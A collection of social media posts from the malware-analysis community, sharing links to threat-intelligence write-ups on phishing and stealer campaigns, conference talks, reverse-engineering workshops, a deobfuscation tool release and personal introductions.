Great analysis of the malware distributed with the esling-config-prettier NPM package compromise on Friday: https://c-b.io/2025-07-20+-+Install+Linters%2C+Get+Malware+-+DevSecOps+Speedrun+Edition

By c-b.io on Bluesky / cyb3rjerry on Twitter :D

Cybercrime group FIN6 (aka Skeleton Spider) is leveraging trusted cloud services like AWS to deliver malware through fake job applications.

Our latest analysis breaks down:
How attackers use LinkedIn & Indeed to build trust
The use of resume-themed phishing lures
Cloud-hosted infrastructure that evades detection
The delivery of the More_eggs backdoor via .LNK files
Key defense strategies for recruiters and security teams

This campaign is a masterclass in low-complexity, high-evasion phishing

Read the full breakdown: https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Skeleton-Spider

Ever wonder how cybercriminals weaponize PDFs?

Check out Filipi Pires' #BSidesBoulder25 talk, "Structural Insights: PDF Analysis for Detecting and Defending Against Threats"! In his session, he’ll explore the structure of PDFs and how malicious payload can be hidden within them, provide guidance on identifying how Indicators of Attack (IOAs) found within them, and show you how to outsmart common obfuscation routines found in them. Come for the malware, stay for the live demos and defense tips! #CyberSecurity #PDFThreats #MalwareAnalysis #BSides #BSidesBoulder

Check out our full schedule at https://bsidesboulder.org/schedule/

Tickets are available for purchase for our 13 June event here: https://www.eventbrite.com/e/bsides-boulder-2025-registration-1290129274389

Hot off the presses!

DomainTools Investigations shares that a spoofed antivirus download page is delivering VenomRAT, StormKitty, and SilentTrinity—a powerful combo for credential theft, persistence, and long-term access.

We traced the infrastructure, payloads, and attacker tactics.

Full breakdown: https://dti.domaintools.com/venomrat/?utm_source=Mastodon&utm_medium=Social&utm_campaign=VenomRAT

Hi Rust reversing fans - the recording of my talk at @REverseConf: Reconstructing Rust Types: A Practical Guide for Reverse Engineers, is available for you to watch!

https://www.youtube.com/watch?v=SGLX7g2a-gw

Next Thursday, May 15 at @NorthSec in Montreal, I will be hosting the workshop "Reconstructing Rust Types: A Practical Guide for Reverse Engineers"! This will be a 3-hour workshop how to approach Rust types and data structures when reversing Rust binaries. See https://nsec.io/session/2025-reconstructing-rust-types-a-practical-guide-for-reverse-engineers.html for more details!

Workshops at NorthSec will be streamed on YouTube Live. My workshop is scheduled for 1300-1600 EDT (UTC-4) on Thursday, May 15 in the Workshop 2 track, in Salle de la Commune. The stream link for all the Thursday Salle de la Commune workshops is here: https://www.youtube.com/watch?v=UwJgS32Q6As&list=PLuUtcRxSUZUrW9scJZqhbiuTBwZBJ-Qic&index=7

Looking forward to seeing folks there!

(Edited since I can't count days of the week apparently: May 15, which is when my workshop is occurring, is a Thursday, not a Wednesday.)

Experts report that a new social engineering technique is using ClickFix Captcha to deliver malware like Quakbot, effectively bypassing traditional security measures and posing a significant threat. #MalwareAnalysis #CyberSecurity https://darkatlas.io/blog/delivering-trojans-via-clickfix-captcha

With our team at Stratosphere Laboratory AIC FEE CTU, we are organising this year's Honeynet Project Workshop 2025 in Prague!

It will be a unique space to share your passion for deception technologies, honeypots, and cybersecurity with industry leaders and fellow researchers!

We are looking for sponsors who want to support deception research!
Early birds are still open until April 29th! Grab your tickets!
Last days to submit your training and talks proposals!
Students can apply for a Cédric Blancher Memorial Scholarship!

This is the first time the conference is coming to Prague, with previous editions hosted in Copenhagen (2024), Innsbruck (2019), Taipei (2018), Canberra (2017), San Antonio (2016), Stavanger (2015), Warsaw (2014), Dubai (2013), San Francisco (2012), Paris (2011), Mexico City (2010) and Kuala Lumpur (2009).

What a unique opportunity!

https://prague2025.honeynet.org/

Boost and help us spread the word!

In the course of its investigations, @volexity frequently encounters malware samples written in Golang. This reflects the increase in popularity of the Golang generally, and presents challenges to reverse engineering tools.
 
Today, @volexity is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. @r00tbsd & Killian Raimbaud presented details at INCYBER Forum earlier today.
 
GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!
 
Check out the blog post on how GoResolver works and where to download it: https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/
 
#dfir #reversing #malwareanalysis

Malware Is Evolving — And So Are the Languages It’s Written In — A new study highlights a growing tactic among malware developers: coding in uncommon languages to evade detection.

Key takeaways:
Obscure languages like Lisp, Rust, Haskell, Delphi, and Phix are harder for static analysis tools to parse.
These languages often produce fragmented memory layouts and more indirect execution paths, complicating reverse engineering.
Even the choice of compiler — like Tiny C or Embarcadero Delphi — impacts how easily malware can be flagged.
APTs (Advanced Persistent Threats) are increasingly adopting these strategies to fly under the radar.

Security teams must broaden their detection capabilities and adapt tooling for these underrepresented programming environments.

#CyberSecurity #ThreatIntel #MalwareAnalysis #Infosec #Programming #ReverseEngineering #security #privacy #cloud #infosec

https://www.theregister.com/2025/03/29/malware_obscure_languages/

I'm in a weird position professionally and guess I am looking for a #mentor ? Maybe just someone more experienced than me to talk to and not necessarily some long term commitment of expectations? Growth just isn't going to happen where I'm at and I think I keep getting stuck in an under-/overqualified limbo.

Mainly work in #malwareanalysis #threatintel #detectionengineering with heavy #programming skills.

Always see #CyberMentorMondays does it do anything?

Amadey tops the charts associated with the most malware sites (3112 samples) over the last 30 days. But, which malware family had the most significant increase?  

Find out here - URLHaus | Malware sites  
https://www.spamhaus.org/malware-digest/#urlhaus

All the data in this report is provided by @abuse_ch, a project committed to fighting abuse on the internet.

A funny phishing targeting GitHub users with an email notification about a security issue on a existing repository.

Then the captcha verification on a malicious website is trying to trick the user to run a shell command on Windows.

Powershell to be executed by the user
https://gist.github.com/adulau/6cf6f3e9c5bbd9106af8814d0a22f473

File downloaded https://pandora.circl.lu/analysis/21e8f693-361b-4a04-853c-276f9dd841e4/seed-1XqUr4mADaFYlLAyrBH8oQUBgOoEbceZ586b8h05YyA - Lumma Stealer

Malicious domain analysis. https://lookyloo.circl.lu/tree/91106035-dfec-4acc-af06-c9fc36c62774

I accidentally removed this; 1 sec

Hello! I just joined, a friend mentioned this nice social and I just joined. Happy to be here! a small intro: I am 24 years old, I am always into reverse engineering. More specifically - malware reversing. Including Rootkits, EQGRP stuff, and such. Nice to meet everyone!

If needed, my github is this:
https://github.com/loneicewolf
(I always include it in intro's)

Wishes and Saluting Sweden!
DMS/PMS open; if needed ^_^

What are your go-to tools for #malwareanalysis ?

Delving into the wonderful world of MacOS malware, this time I'm analysing "PureLand" - an info stealer targeting crypto wallets on MacOS systems. Its the first attempt and we spend some time understanding the structure of MacOS applications. https://polaryse.github.io/posts/pureland_analysis/#MacOS #macmalware #malware #reverseengineering #malwareanalysis #ARM #infostealer #pureland #eCrime

And here we have Part 2 of the series: Using UTM to emulate x86_64 and the creation of a macOS malware analysis VM.
https://polaryse.github.io/posts/applesiliconenv_utm/

I was recently approached by a friend who had a website they manage be compromised. They offered to let me take a look at some of the files left behind by the attacker. In today's blog post, I go over my methods for deobfuscating a staging script they used.

#hacking #MalwareAnalysis #ReverseEngineering #PHP #CyberSecurity #InfoSec #IndieWeb #SmallWeb
https://www.vzqk50.com/blog/deobfuscating-a-malware-stager/